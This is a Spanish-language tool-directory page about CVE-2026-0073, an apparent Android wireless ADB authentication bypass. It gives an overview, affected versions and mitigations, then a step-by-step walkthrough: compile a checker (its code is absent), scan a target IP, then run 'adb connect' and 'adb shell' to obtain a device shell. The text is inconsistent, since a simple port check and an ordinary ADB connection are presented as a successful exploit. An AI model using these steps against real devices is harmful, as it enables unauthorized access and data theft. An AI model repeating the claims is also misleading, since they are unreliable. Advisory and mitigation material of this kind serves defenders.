Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0073 — CVE-2026-0073 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-0073
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónSeguridad InalámbricaPruebas de PenetraciónAutenticación
GitHub0xblackash/cve-2026-0073

CVE-2026-0073

CVE-2026-0073

Ver Repositorio
5148hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🤖 CVE-2026-0073 - Omisión de autenticación de ADB inalámbrico

ChatGPT Image May 7, 2026, 03_05_19 PM

Critical Android Type


📌 Descripción general

CVE-2026-0073 es una vulnerabilidad crítica de omisión de autenticación en el ADB inalámbrico de Android (demonio adbd).

Un atacante en la misma red puede omitir la autenticación TLS mutua y conectarse al dispositivo sin la aprobación del usuario ni emparejamiento previo.

Información clave

ElementoDetalles
ID CVECVE-2026-0073
GravedadCrítica
Puntuación CVSS8.8
Componente afectadoadbd (Android Debug Bridge) - Manejador TLS
TipoOmisión de autenticación
ImpactoAcceso remoto al shell (usuario shell)
CorregidaBoletín de seguridad de Android de mayo de 2026

🛠 Versiones afectadas

  • Android 14
  • Android 15
  • Android 16
  • Android 16 QPR2

Corregido en: nivel de parche de seguridad 2026-05-01 y posteriores.


🎯 Requisitos del ataque

  • El dispositivo objetivo debe tener habilitada la depuración inalámbrica
  • El atacante debe estar en la misma red Wi-Fi
  • Opciones de desarrollador habilitadas (común en muchos dispositivos)
  • El dispositivo se ha emparejado con ADB al menos una vez antes

⚠️ Impacto

  • No se requiere interacción del usuario
  • El atacante puede obtener un shell ADB completo
  • Puede instalar aplicaciones, extraer datos y ejecutar comandos como usuario shell
  • Puede escalar privilegios si existen otras vulnerabilidades
  • Especialmente peligroso en entornos empresariales, de desarrollo y de pruebas

🛡️ Mitigación

  • Actualiza al parche de seguridad de mayo de 2026 o posterior
  • Desactiva la depuración inalámbrica cuando no esté en uso
  • Evita habilitar el ADB inalámbrico en redes públicas o no confiables
  • Usa ADB por USB en lugar de inalámbrico cuando sea posible

🧪 Estado del PoC

  • Hay PoCs públicos disponibles
  • La versión simple usa un cliente ADB modificado con omisión de certificado
  • Funciona explotando una falla lógica en adbd_tls_verify_cert()

✅ Solución para tu error

El error ocurre porque el archivo CVE-2026-0073-Checker.cpp aún no existe.


Solución paso a paso:

  1. Crea el archivo con este comando:
root@kitploit:~
nano CVE-2026-0073-Checker.cpp
  1. Copia y pega el código completo a continuación en el editor:

  2. Guarda y sal (Ctrl + X → Y → Enter)

  3. Compila de nuevo:

root@kitploit:~
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
  1. Ejecútalo:
root@kitploit:~
./CVE-2026-0073 192.168.1.105

✅ Exploit

Esto es exactamente lo que verás si el programa C++ funciona correctamente en un dispositivo Android vulnerable:

Salida esperada en caso de éxito:

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                CVE-2026-0073  PoC Checker                    ║
║         Android Wireless ADB Authentication Bypass           ║
╚══════════════════════════════════════════════════════════════╝

Target : 192.168.1.105

[*] Checking 192.168.1.105:5555 → OPEN

[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073

Next Steps:
   1. adb connect 192.168.1.105:5555
   2. adb shell

Qué significa esto:

  • OPEN en verde → El puerto ADB está a la escucha.
  • El programa detectó que la depuración inalámbrica está habilitada.
  • Esto significa que el dispositivo tiene una alta probabilidad de ser explotable con CVE-2026-0073.

Siguiente prueba real (después de ejecutar la herramienta C++):

Ejecuta estos comandos:

root@kitploit:~
adb connect 192.168.1.105:5555

Si dice:

root@kitploit:~
connected to 192.168.1.105:5555

Entonces escribe:

root@kitploit:~
adb shell

Deberías obtener acceso al dispositivo:

root@kitploit:~
pixel8:/ $ 

Eso es explotación completamente exitosa.


⚠️ Descargo de responsabilidad

Este PoC es solo para fines educativos y pruebas autorizadas.

Solo puedes usar esta herramienta en dispositivos que te pertenezcan o sobre los que tengas permiso explícito para realizar pruebas. El uso no autorizado es ilegal y está estrictamente prohibido.

Úsalo bajo tu propio riesgo. El autor no se hace responsable de ningún daño o consecuencia legal.


🎯 Hecho con precaución: úsalo solo en dispositivos autorizados.

Descargar herramienta